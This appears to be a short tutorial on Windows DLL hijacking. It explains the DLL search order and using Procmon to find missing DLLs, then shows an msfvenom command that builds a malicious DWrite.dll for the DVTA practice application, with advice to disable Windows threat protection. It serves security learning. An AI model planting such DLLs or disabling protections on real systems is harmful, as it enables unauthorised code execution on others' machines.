DLL hijacking
Dynamic Link Library
Last updated
Dynamic Link Library
Last updated
DLL are piece of code that can be utilized by many different programs. It promotes modular approach and it is easily scalable.
More on DLLs can be found here in detail.
DLL are executable and loaded into RAM when needed by an application. The path of DLLs are set by windows environment variables and if application doesn' t have absolute path of a DLL then it search for it in system but what if attacker replaced a valid DLL file with a malicous one with same name(considering attacker has write permission in required directory). Application would end up executing malicious piece of code and it's called DLL hijacking.
Working of DLL hijack is same as any other package hijack as searching of a DLL is done in same pattern(there can be some variations of course) as any another package. It is searched in following order:
Directory from where application was executed.
Current working directory.
system folder (C:\windows\System32)
Directories that are defined by PATH environment variables.
If a application has to run a dll file present in system32 folder but attacker can place a dll in directory where application is located then that dll attacker's dll will be found first and executed.
Procmon from sysinternal suite can help in identifying DLL which application tried to load from application loading directory but didn't found it.
So we can target particularly those DLLs as we have write permission over there.
In case of DVTA DWrite.dll will work. Create a dll file with help of msfvenom over a linux machine.
msfvenom -f dll -p windows/exec CMD="C:\windows\system32\calc.exe" -o DWrite.dll
Now place this dll in DVTA's directory remember windows virus and threat protection need to be turned off for this as it will be identified as virus and windows won't allow it.
Now when you will run DVTA, calculator will pop.
